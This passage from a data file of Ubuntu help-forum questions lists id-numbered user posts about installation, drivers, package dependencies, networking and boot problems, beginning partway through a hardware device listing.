vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 47 region 0 : memory at f1634000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 1 ( rev d4 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 memory behind bridge : f1500000-f15fffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 2 ( rev d4 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=0 i/o behind bridge : 00003000-00003fff memory behind bridge : f1400000-f14fffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : lenovo device 220e control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 23 region 0 : memory at f163d000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1f.0 isa bridge : intel corporation qm87 express lpc controller ( rev 04 ) subsystem : lenovo device 220e control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 capabilities : < access denied > kernel modules : lpc_ich 00:1f.2 sata controller : intel corporation 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : lenovo device 220e control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz+ udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin b routed to irq 45 region 0 : i/o ports at 50a8 [ size=8 ] region 1 : i/o ports at 50b4 [ size=4 ] region 2 : i/o ports at 50a0 [ size=8 ] region 3 : i/o ports at 50b0 [ size=4 ] region 4 : i/o ports at 5060 [ size=32 ] region 5 : memory at f163c000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci kernel modules : ahci 00:1f.3 smbus : intel corporation 8 series/c220 series chipset family smbus controller ( rev 04 ) subsystem : lenovo device 220e control : i/o+ mem+ busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- interrupt : pin c routed to irq 10 region 0 : memory at f1638000 ( 64-bit , non-prefetchable ) [ size=256 ] region 4 : i/o ports at efa0 [ size=32 ] kernel modules : i2c-i801 02:00.0 vga compatible controller : nvidia corporation gk208m [ geforce gt 730m ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) control : i/o+ mem+ busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- interrupt : pin a routed to irq 17 region 0 : memory at f0000000 ( 32-bit , non-prefetchable ) [ size=16m ] region 1 : memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] region 3 : memory at d0000000 ( 64-bit , prefetchable ) [ size=32m ] region 5 : i/o ports at 4000 [ size=128 ] expansion rom at < ignored > [ disabled ] capabilities : < access denied > kernel modules : nouveau , nvidiafb 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5227 ( rev 01 ) subsystem : lenovo device 220e control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 44 region 0 : memory at f1500000 ( 32-bit , non-prefetchable ) [ size=4k ] capabilities : < access denied > kernel driver in use : rtsx_pci kernel modules : rtsx_pci 04:00.0 network controller : realtek semiconductor co. , ltd. device 818b subsystem : realtek semiconductor co. , ltd. device 001b control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 10 region 0 : i/o ports at 3000 [ size=256 ] region 2 : memory at f1400000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel modules : rtl8192ee
380464	lenovo t440s deactivate touch pad but keep mouse button function working ?	the lenovo t440s has a touchpad but no mouse buttons anymore . the mouse button functionality is replaced by hitting the touchpad stronger . i know it is possible to deactivate the touchpad . my question : it is possible to deactivate the mouse-pointer functionality of the touchpad in the lenovo t400s while still keep the necessary mouse button functionality of the touchpad ? best regards
380465	how to install ubuntu to a drive having windows i , e drive ( c ) ? .	i downloaded both 12.04.3 and 13.10 iso 's but both installers does n't detect pre installed windows ( windows 8 in my case ) on my pc and even from inside the window ( wubi ) it only shows an option to install in drive ( d ) . i read of mbr and gpt and checked the drives . all are in mbr , please help me out ...
380468	ubuntu 13.10 64 bit samba failed to install	ubuntu software centre indicates samba installed but unity search indicates samba not found . terminal returns samba not installed . how can i enable samba ?
380473	backtrack tools on ubunru	i 've copied all the files from backtrack ( /root/pentest ) to my ubuntu /root directory and i 've tested aircrack-ng , crunch , fern wifi cracker they working fine . qs : how to create terminal shortcuts/link to run the all the tools in pentest just like it available on backtrack 5 r3 .
380476	how to install temple run ?	is there any way i can install and play temple run in ubuntu 13.04 . i have basic terminal command skills and do n't mind compiling it from source .
380477	how to mount a device in ttyusb0 ?	i 'm trying to mount a usb internet dongle ( data card ) . the output of dmesg is : [ 20200.396232 ] option 2-1.2:1.1 : gsm modem ( 1-port ) converter detected [ 20200.396448 ] usb 2-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 20200.396681 ] option 2-1.2:1.2 : gsm modem ( 1-port ) converter detected [ 20200.396891 ] usb 2-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb2 [ 20200.397090 ] option 2-1.2:1.3 : gsm modem ( 1-port ) converter detected [ 20200.397270 ] usb 2-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb3 [ 20200.397674 ] scsi15 : usb-storage 2-1.2:1.4 [ 20201.393856 ] scsi 15:0:0:0 : direct-access zte usb storage fffe 2.31 pq : 0 ansi : 2 [ 20201.394677 ] sd 15:0:0:0 : attached scsi generic sg2 type 0 [ 20201.396164 ] sd 15:0:0:0 : [ sdb ] attached scsi removable disk how do i mount this so that i can run an installation script present in it ?
380478	nis not working	in a local network , where a nis server and some nis clients are correctly working , a new installed ubuntu 12.04.3 machine seems not to like nis . when nis is not installed the network drive is mounted correctly on that machine , i have web access and so on . if i install nis on this machine , and do the following tasks set the right dominion /etc/defaultdomain - > xxxxxx ) check that nis is included in /etc/nsswitch.conf add the following line to the file /etc/pam.d/common-auth auth optional pam_group.so nothing works anymore : when i reboot , the lightdm does n't start , a shell shows the message `` mountall disconnected from plymouth '' , no network user can login , and only the local user can login , but it is veeeery slow . any idea ? thank you !
380479	ubuntu software center not repairing	installarchives ( ) failed : dpkg : dependency problems prevent configuration of hplip : hplip depends on libhpmud0 ( = 3.11.5-1.1~ppa1 ) ; however : version of libhpmud0 on system is 3.12.2-1ubuntu3.3 . hplip depends on libsane-hpaio ( = 3.11.5-1.1~ppa1 ) ; however : version of libsane-hpaio on system is 3.12.2-1ubuntu3.3 . hplip depends on hplip-data ( = 3.11.5-1.1~ppa1 ) ; however : version of hplip-data on system is 3.12.2-1ubuntu3.3 . hplip depends on hplip-cups ( = 3.11.5-1.1~ppa1 ) ; however : version of hplip-cups on system is 3.12.2-1ubuntu3.3 . hplip depends on python ( < < 2.7 ) ; however : version of python on system is 2.7.3-0ubuntu2 . printer-driver-postscript-hp ( 3.12.2-1ubuntu3.3 ) breaks hplip ( < < 3.11.10-1ubuntu2 ) and is unpacked but not configured . version of hplip to be configured is 3.11.5-1.1~ppa1 . dpkg : error processing hplip ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of printer-driver-postscript-hp : printer-driver-postscript-hp depends on hplip ( > = 3.12.2-1ubuntu3.3 ) ; however : version of hplip on system is 3.11.5-1.1~ppa1 . dpkg : error processing printer-driver-postscript-hp ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of hplip-gui : hplip-gui depends on hplip ( > = 3.11.5-1.1~ppa1 ) ; however : package hplip is not configured yet . dpkg : error processing hplip-gui ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already errors were encountered while processing : hplip printer-driver-postscript-hp hplip-gui error in function : dpkg : dependency problems prevent configuration of printer-driver-postscript-hp : printer-driver-postscript-hp depends on hplip ( > = 3.12.2-1ubuntu3.3 ) ; however : version of hplip on system is 3.11.5-1.1~ppa1 . dpkg : error processing printer-driver-postscript-hp ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of hplip : hplip depends on libhpmud0 ( = 3.11.5-1.1~ppa1 ) ; however : version of libhpmud0 on system is 3.12.2-1ubuntu3.3 . hplip depends on libsane-hpaio ( = 3.11.5-1.1~ppa1 ) ; however : version of libsane-hpaio on system is 3.12.2-1ubuntu3.3 . hplip depends on hplip-data ( = 3.11.5-1.1~ppa1 ) ; however : version of hplip-data on system is 3.12.2-1ubuntu3.3 . hplip depends on hplip-cups ( = 3.11.5-1.1~ppa1 ) ; however : version of hplip-cups on system is 3.12.2-1ubuntu3.3 . hplip depends on python ( < < 2.7 ) ; however : version of python on system is 2.7.3-0ubuntu2 . printer-driver-postscript-hp ( 3.12.2-1ubuntu3.3 ) breaks hplip ( < < 3.11.10-1ubuntu2 ) and is unpacked but not configured . version of hplip to be configured is 3.11.5-1.1~ppa1 . dpkg : error processing hplip ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of hplip-gui : hplip-gui depends on hplip ( > = 3.11.5-1.1~ppa1 ) ; however : package hplip is not configured yet . dpkg : error processing hplip-gui ( -- configure ) : dependency problems - leaving unconfigured
380480	xubuntu 13.10 networking	i recently installed xubuntu 13.10 , from then i am having issues with network . when i tried to restart the network using the command service networking restart , the network never come up . i am able to see the following messages in the syslog could not get the system bus . make sure the message bus daemon is running ! message : failed to connect to socket /var/run/dbus/system_bus_socket : no such file or directory '' only restart of the system will bring the network up . please let me know if this is a bug or what could be the reason for this issue .
380483	i ca n't start with xp ( ubuntu 13.04 )	in the grub i get the option to start windows , but when i try to start it , i ca n't . i have two win xp in the boot , so it should start the boot , but it does n't . can you help me ?
380484	`` ca n't open '' an /opt file	this is my first post . i wanted to ask for any idea so to solve my problem . i am using ubuntu 12.04 lts , and my purpose is to use openfoam cfd software . i am trying to execute an script called allrun that corresponds to a tutorial . i am using the sudo command like this . sudo ./allrun then it asks for my password and after introducing it , it suddenly appears a message saying : ./allrun : 5 : . : ca n't open /bin/tools/runfunctions this path appeares at line 5 as sourced in the script , so like : . $ wm_project_dir/bin/tools/runfunctions being $ wm_project_dir a variable defined in opt/openfoam22/etc/bashrc and pointing the directory : $ wm_project_dir= /opt/openfoam222 ( this bashrc is at the same time sourced in ~/.bashrc file , and i can use the variable in the terminal , so i assume it is allright sourced ) i have tried also to chmod the runfunctions file with rwx permissions , and veryfied with '' ls -la '' that its permissions changed ( they did ) , but did n't solve anything . i am new in linux , and any help will be great , thanks in advance .
380485	regarding ubuntu 13.10 upgrade	i am planning to install ubuntu alongside windows 7 ( both fresh as i am buying new laptop ) by doing separate installation partition for both os . i have two ques : 1 ) for ubuntu 13.10 it says 9 months support . does it mean i ca n't be able to use after 9 months ? 2 ) if i have to update in future to 14.xx lts system , then will my windows 7 be affected ? i do n't want to loose any data and do n't want to do fresh installation in future . please help me . i am going to use ubuntu first time .
380488	enable gnome login	so as i installed plasma desktop it obviously took over and now instead of desired login screen ( picture ) i see some kde lightdm theme..would it be possible i could have the default ubuntu 12.04 login screen ( on picture-i ca n't post it bc of reputation but you know the one with grid and all ) ?
380489	how to clear skype chat history ?	it seems that in the window version of skype , there is an option to clear chat history . it is supposed to be tools > options > im & sms > clear history button but effectively nothing similar is here : this option is not present on the version that come with my ubuntu 13.04 . in the privacy settings there is this option : and somewhere in the skype forum it is said that changing that to disable history and then restarting skype will get rid of the chat history . tried that , do n't work . searching a bit i found that you have to eliminate some file in the skype directory ; i did that from the directory i have : cd $ home/.skype/my_skype_name/ rm chat*.dbb user*.dbb ... still no go . before i get rid of all the .skype directory and re-configure all skype , is there anyone that know how to do it ? the content of the directory is : alert2048.dbb chatsync httpfe msn.db-journal alert4096.dbb config.lck keyval.db msn.lock bistats.db config.xml keyval.lock profile16384.dbb bistats.db-journal contactgroup256.dbb main.db sms512.dbb bistats.lock dc.db main.db-journal transfer256.dbb call256.dbb eas.db main.lock voicemail callmember256.dbb eas.db-journal msn.db voicemail256.dbb removing all other *.dbb does n't work , either . lesson : never put sensitive data on a skype chat .
380490	webkit webview cause error	i try to write simple gui application using ubuntu quickly and python . so , i need to use webkit in it and i write something like this : webview = webkit.webview ( ) but this line in my code ruined program with error : glib-gio-error ** : settings schema 'org.gnome.system.proxy ' is not installed gsettings-desktop-schemas is installing and now i have no idea how to fix it
380491	aoc e2060sda monitor	we have ubuntu 12.04 and are unable to find a driver for the aoc 2060sda monitor . does anyone know if one exists .
380492	undefined reference to 'dlopen ' 'dlclose ' 'dlerror ' 'dlsym	i 'm installing a program on ubuntu 12.04 lts . i 've run ./configure and i get no error messages , when i then run make i get errors . please see below for the errors : make all-recursive make [ 1 ] : entering directory `/home/mel/documents/software/plinkseq-0.09' making all in lib make [ 2 ] : entering directory `/home/mel/documents/software/plinkseq-0.09/lib' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/mel/documents/software/plinkseq-0.09/lib' making all in client make [ 2 ] : entering directory `/home/mel/documents/software/plinkseq-0.09/client' /bin/bash ../libtool -- tag=cxx -- mode=link g++ -g -o2 -lz -ldl -o pseq pseq-skat.o pseq-util.o pseq-ibs.o pseq-main.o pseq-func.o pseq-summaries.o pseq-views.o pseq-assoc.o pseq-genic.o pseq-compare.o pseq-ibd.o pseq-loaders.o pseq-clusters.o pseq-varfunc.o pseq-glm-tests.o pseq-stepup.o pseq-kbac.o pseq-netassoc.o pseq-davies.o pseq-gseq.o pseq-extra.o pseq-cnv.o pseq-chet.o ../lib/libplinkseq.la libtool : link : g++ -g -o2 -o .libs/pseq pseq-skat.o pseq-util.o pseq-ibs.o pseq-main.o pseq-func.o pseq-summaries.o pseq-views.o pseq-assoc.o pseq-genic.o pseq-compare.o pseq-ibd.o pseq-loaders.o pseq-clusters.o pseq-varfunc.o pseq-glm-tests.o pseq-stepup.o pseq-kbac.o pseq-netassoc.o pseq-davies.o pseq-gseq.o pseq-extra.o pseq-cnv.o pseq-chet.o -ldl ../lib/.libs/libplinkseq.so -lz -lprotobuf ../lib/.libs/libplinkseq.so : undefined reference to `dlopen' ../lib/.libs/libplinkseq.so : undefined reference to `dlclose' ../lib/.libs/libplinkseq.so : undefined reference to `dlerror' ../lib/.libs/libplinkseq.so : undefined reference to `dlsym' collect2 : ld returned 1 exit status make [ 2 ] : *** [ pseq ] error 1 make [ 2 ] : leaving directory `/home/mel/documents/software/plinkseq-0.09/client' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/mel/documents/software/plinkseq-0.09' make : *** [ all ] error 2 i 'm not too good with linux so please be simple with replies . thanks .
380493	unable to configure third monitor ( samsung syncmaster 943bx ) with nvidia quadro4000	i have pny-nvidia quadro 4000 with 3 display ports on my ubuntu 12.04 machine . i have successfully configured two monitors using 1 dvi-l port and 1 of the two display ports ( with male display port to female dvi-d adapter ) . i want to use remaining display port to connect to to a 3rd monitor ( using identical display port-to-dvi-d adapter that is used for my second monitor ) but can not get it to work through nvidia-settings . i can see this third monitor listed into nvidia-settings but when tried to save the x configuration file , it showed layout inconsistencies error : metamode 1 of screen 0 has more than 2 active display devices moreover , the blank screen of this third monitor displays a message check signal cable analog could this be resolved now by using display port-to-vga adaptor instead ? or x.config needs to be changed manually ?
380498	xsnow does not work	i have installed the old program xsnow with apt . this program is supposed to make snow ( the type of precipitation ) appear on the desktop . however , running the program does nothing except return the following code : xsnow-1.42resizeable , december 14th 2001 by rick jansen ( rja @ euronet.nl ) www : http : //www.euronet.nl/~rja/xsnow/ this is because the program is designed to draw the snow on the root x window , as stated on the website : frequently asked question : i start xsnow but i do n't see any snow ? answer : xsnow makes it snow on the x-window `` root '' window . that root window is often obscured by desktop managers , to display icons and tools . so , xsnow works fine , you just can not see the snow ! see the readme for details and possible solutions . i tried it in an ubuntu 13.10 vm , kubuntu 13.10 and 14.04 , and a lubuntu trusty live usb . it is working in xubuntu , because in xfce we see the root x window by default . in chat , someone reported it working in ubuntu 12.04 , but in my ubuntu 13.10 vm i do n't see snow . the problem is that , as i mentioned , xsnow draws solely on the root x window . the root x window is the `` parent '' of all the other x windows and is therefore also invisible , because modern desktop environments such as kde and unity usually hide the root x window with a desktop effects compositor . so xsnow still draws snow , ( you can get snatches of it when logging in and out due to graphics fragmentation ) it 's just not visible . on simpler desktops like openbox and xfce , the x window ( and thus the snow ) are completely visible . is there any way to view the root x window activity and thus see the snow ?
380499	problem with installing intel-linux-graphics-installer in 13.10 : dependency problems	when i try in apt-get install intel drivers i have this errors : i do n't know what i do wrong . how can i resolve this ?
380500	installing ubuntu over win xp	i have downloaded ubuntu and put it to dvd and it boots on my laptop running xp but it will not let me install ubuntu over the xp . what have i or am i doing wrong . laptop is sony vaio 32 bit 1gig ram .
380501	when i enable compiz , i ca n't close , minimize , or move the windows	i can with firefox , but i have to enable a firefox fix in compiz . but i'ts the only one . the others compiz features are working , but if i maximize a window , i ca n't minimize , move , or close it .
380503	remote ubuntu 12.04 desktop can not display x on local laptop	i have an ubuntu 13.04 laptop and an ubuntu 12.04 desktop . i want to be able to open and see images , windows , and pdf files that are located on the desktop via remote access from my laptop . when i tried to follow instructions like those at hungry.com , i managed to sudo apt-get install telnetd , xhost + , then access into my desktop using telnet , set and export the display variable , and then open a .png file using the eog image.png command , but the image would open up on the remote desktop 's screen and not on my laptop 's screen . i tried changing the display variable to the ip address of my laptop followed by :0 , but i could only get images to display on the remote desktop . in addition , when i tried to do it the other way around and to access my laptop from my desktop , i got the message warning ** : could not open x display . in addition , if i do n't have display set , xterm terminal says x11 initialization failed finally i tried to use ssh . first i generated a public and private key , then when i tried to connect using putty with the ip address of the remote desktop and default settings . when i clicked open , it said putty fatal error connection refused : ok . when i tried the terminal command ssh # # # . # # # . # # . # # # ( remote desktop ip ) , ssh said the same thing : ssh : connect to host # # # . # # # . # # . # # # port 22 : connection refused . how do i get the pictures from my desktop to appear on my laptop ? for my purposes , i do n't care if anyone can intercept and view my homework files . i just want there to be as little lag as possible and to be able to see the remote desktop windows . ssh is too slow , vnc does n't allow multiple users to view different images , and telnet just wo n't re-route my image back to the local machine . look - telnet only opens in the remote machine ( not the local one ) regardless of how i set the ip . see : ubuntu @ ubuntu : /home $ telnet # # # . # # # . # # . # # # //host ip address trying # # # . # # # . # # . # # # //host ip address connected to # # # . # # # . # # . # # # //host ip address escape character is '^ ] ' . ubuntu 12.04.3 lts johnmichaelreed @ ubuntu1204lts : ~ $ display= # # # . # # # . # # . # # # :0.0 //local ip johnmichaelreed @ ubuntu1204lts : ~ $ export display johnmichaelreed @ ubuntu1204lts : ~ $ eog ./facebook.png //displays on host 's screen . it 's either the above , or ** ( eog:10450 ) : warning ** : command line `dbus-launch -- autolaunch=6d91b5555c8bbff7573f20a500000002 -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : autolaunch error : x11 initialization failed.\n what 's up with that ?
380508	change password and install vlc player	i am the new user of ubuntu . recently i installed ubuntu 13.04 on my system . actually i want to change my previous password with the new one . secondly , i want to install vlc player through commands . please help me to sort out these problems ?
380511	dell xps 13 sound problem	since the last update ( 20.11.2013 ) for ubuntu 13.10 there are noises in the left speaker . they appear in the internal speakers when i boot the system and if i choose the audio jack in the external speakers . do anyone else have those same problems ? what could it be ? i have allready add this ppa deb http : //ppa.launchpad.net/ubuntu-audio-dev/alsa-daily/ubuntu saucy main from https : //launchpad.net/~ubuntu-audio-dev/+archive/alsa-daily
380512	how to download photos from canon 60d to my kubuntu 13.10 machine	this problem started after upgrading from kubuntu 13.10 from kubuntu 13.04 ( it worked with 13.04 ) . my 13.10 system notices that a camera was connected but i can not drill down in the file manager deeper than camera : dmsg tail produces the following among other things : [ 21882.013611 ] usb 1-5 : usb disconnect , device number 9 [ 21887.918533 ] usb 1-5 : new high-speed usb device number 10 using ehci-pci [ 21888.052210 ] usb 1-5 : new usb device found , idvendor=04a9 , idproduct=3215 [ 21888.052224 ] usb 1-5 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 21888.052231 ] usb 1-5 : product : canon digital camera [ 21888.052237 ] usb 1-5 : manufacturer : canon inc. [ 21952.011544 ] usb 1-5 : usb disconnect , device number 10 uname -r produces > > 3.11.0-13-generic how can i fix this issue ?
380517	how to intigrate tomcat6 with php5	hi i am running tomcat6 server on my ubuntu 13.10 i want my tomcat6 server to run a php file . i browse a lot but did n't found any documentation explaining it clearly to me any suggestion or help is appriciated thanks in advance
380518	how to safely extend ubuntu partition ?	i need more space at for my ubuntu partition , so i will need to shrink the data partition and extend the size of the ext4 , right ? this is the current state of the partitions : what is the proper way to achieve this ? using windows to shrink the data partition ? ( an unrelated partition to windows , though ) . and then , with an ubuntu live cd , using gparted , extending the size of the ext4 partition to the unallocated space ? update-1 : the state i posted above , was from my laptop . i tried the resizing process at my desktop and at the step grow filesystem to fill the partition > real resize it failed and here are the details ( also , on pastebin ) . what can i do ? update-2 : at gparted , it seems that the process completed successfully . the unallocated space , is the one i 've set before the partition shrink process . so , i can assume that everything went good ? also , if you see , at the bottom of the message , it was asking me to reply y/n but i do n't think i could do that via gparted ( and not using a terminal ) . this is the current state from gparted via ubuntu live cd .
380522	error reports and excessive data usage ?	i recently ran ifconfig on my ubuntu 13.10 system and noted an extremely high amount ( 60 gb+ ) of transmitted data . a check of system monitor also showed a continuous stream of outgoing data at about the limit of my connection speed . after a bit of troubleshooting , i noticed that the `` send error reports to canonical '' function was checked , and unchecked it . immediately , data transmission returned to normal . if i re-enable error reports , it begins transmitting an endless flow of data again . is there any explanation for what might have happened , and do i need to be concerned about the data that the system reports having sent out ? i assume that normal error reports are n't supposed to be dozens of gb . clicking the `` show previous reports '' option gets me a 504 gateway timeout .
380523	installation of libsasl2-modules-gssapi-mit failed : unmet dependencies	trying to install cdh4 ( cloudera hadoop ) and manager on 12.04 lts with 3.2.0-56-generic kernel and the installation aborts on the following : the following packages have unmet dependencies : libsasl2-modules-gssapi-mit : depends : libsasl2-modules ( = 2.1.25.dfsg1-3 ) but 2.1.25.dfsg1-3ubuntu0.1 is to be installed e : unable to correct problems , you have held broken packages . doing an apt-get install on libsasl2-modules comes back with sudo apt-get install libsasl2-modules reading package lists ... done building dependency tree reading state information ... done libsasl2-modules is already the newest version . so libsasl2-modules is installed at the most up-to-date version . what 's missing ? i do n't seem to be able to find 2.1.25.dfsg1-3ubuntu0.1 anywhere . greatly appreciated , this is the apt-get check output ... sudo apt-get check reading package lists ... done building dependency tree reading state information ... done thanks again ,
380524	lubuntu install goes black	after installed alongside xp , it says it 'll reboot and the screen has been black for a while . it did this earlier and i reinstalled it with the same result .
380525	getting an error on live usb boot : `` ( initramfs ) unable to find a medium containing a live file system ''	there are plenty of threads on this topic , i 've tried every solution mentioned there : different version of ubuntu ( kubuntu 13.10 , kubuntu 12.04 , ubuntu 12.04 ) using usb 2.0 and usb 3.0 ports different live usb creation software ( linux live usb creator , unetbootin , universal usb installer , kubuntu startup disk creator ) switching from ide to achi uefi and legacy boot disabling secure boot . replacing `` quiet splash '' with `` nomodeset '' in grub plugging out hard disk using different usb drives ( regular usb stick , external usb hdd ) but i still get the same error every time . no difference . my pc is a brand new computer , all systems are functioning well ( i tried to install windows 8 , it works just fine ) . motherboard : ga-970a-ds3p cpu : amd phenom ii x4 970 graphic adaptor : amd radeon hd 5770 ( vapor-x ) what to try next ? please help me prove to my husband that ubuntu can be installed everywhere , i am out of ideas .
380527	run kvm guest from tty	i would like to run a kvm guest from a tty without any x server or graphical elements running . what command do i use to do this if it 's possible ? will running the command give different results in ubuntu desktop and ubuntu server ? how would i exit from the guest once it 's running ? nb i actually want to add an entry in the login menu to take me to the aforementioned guest , but i am planning to ask about that in a separate question . please take this note into consideration if it affects anything .
380528	can write arabic and ca n't read it	i have serious problem and i ca n't solve it my text editor ( gedit , kwrite etc ) can write arabic but it ca n't read it i installed arabic package on my computer and also i configure my layout to arabic so if anyone can help me i 'm using ubuntu 12.04 lts
380530	need help installing ubuntu from cd with no os on the hard drive	i downloaded and burned ubuntu to a disk . when i try to install it the computer tells me `` missing operating system '' . i changed the bios to boot from cd so that is n't the issue . anyone have any ideas on how to make it work ?
380531	add entry to login user menu to directly execute command	i want to add an entry to my login menu to execute and run a program with whatever parameter i specify . i 'm vaguely aware it is possible , but not quite sure how . as a side note , i want to specifically do this with the entry .
380533	how to install fogger ?	i want to know that how to install fogger application , which interact with different web accounts including facebook on ubuntu 13.10 . in main ubuntu repository , it is only available for ubuntu 12.10 how to install it ?
380536	how to creat scripts with daily summary	how to creat scripts which showing me daily summary containing the number of data sent and received for a pre-defined fixed networks applications ( wget , smtp , ftp ) . thank you for any idea : )
380537	how do i compile with gl/glew.h ?	whenever i try to compile a c++ file using : g++ cgatoh.cpp i keep getting the following error : fatal error : gl/glew.h : no such file or directory could someone advise on how to get gl/glew.h library ? how can i solve this problem ?
380538	additional user can not open display	i 'm trying to use wireshark as a non-root user . there is a user called wireshark on my system that is allegedly allowed to capture frames , so i try to run wireshark as him . the problem is that when i do so , this happens $ su - wireshark -c `` wireshark '' password : no protocol specified no protocol specified ( wireshark:8340 ) : gtk-warning ** : can not open display : :0.0 and the program wo n't start . it is apparently a matter of privileges , since i can run it as root without a problem . how can i get to start wireshark as wireshark without sudoing ?
380539	dell latitude d830 unable to connect to the internet	my dell latitude d830 ( bcm4311 wireless chip ) is unable to connect to any wireless connections or even detect them . i was able to find a driver for it but i do n't know what to do with it . the driver is a .tar.gz file .
380541	ca n't login but password is not invalid	i 'm quite new to linux so please excuse me if i ask any stupid questions . i recently upgraded from ubuntu 12.04 to 13.10 . everything was working fine until i accidentally deleted the ubuntu interface ( the taskbar on the left and top ) . i was only getting my wallpaper with the 2 folders that where on the desktop just before the bar on the left and at the top went missing . after that did a clean installation of ubuntu 13.04 but the real problem is : i ca n't log in . the password i use is correct , because if i type the wrong password it logs : invalid , but if i use the right one the screen gets black en then returns to the login screen and asks me to do it again . i 'm using a dual boot with windows vista if that matters if i use [ ctrl ] + [ alt ] + f1 and login that way the password works so i know the password is correct . if my explanation is not clear enough , please inform me so i can give further information . also please inform me if i use the wrong words , i would like to learn more about using linux and ubuntu .
380542	the [ ok ] screen	i m a nvidia user . i installed ubuntu ( only ) 12.04 lts , i installed nvidia drivers.after i restarted my laptop , opened blank screen ( [ ok ] screen ) .i didnt write laptop 's screen anything . what can i do ?
380544	newly installed ubuntu will not boot ?	i 'm new to ubuntu , and i have a windows xp computer . i recently used the windows installer to install ubuntu 12.04.3 ( http : //www.ubuntu.com/download/desktop/install-ubuntu-with-windows ) . after the installation , i rebooted my computer . it automatically went to the ubutu ui . good . i shut down my computer , and a few days later attempted to get back into ubuntu . the computer gave me the choices of windows xp or ubuntu , and i selected ubuntu . but it did n't take me to the ui of ubuntu . it kept the black screen with plain text . it says : gnu grub version 1.99-21ubuntu3.10 minimal bash-like editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completion . grub > _ i do n't know anything about linux/ubuntu really , so i do n't know what to do . my windows xp works fine , though . i talked to some friends about this ; they seem to think the problem might be that i had updated some nvidia drivers on the xp side of things . any help ?
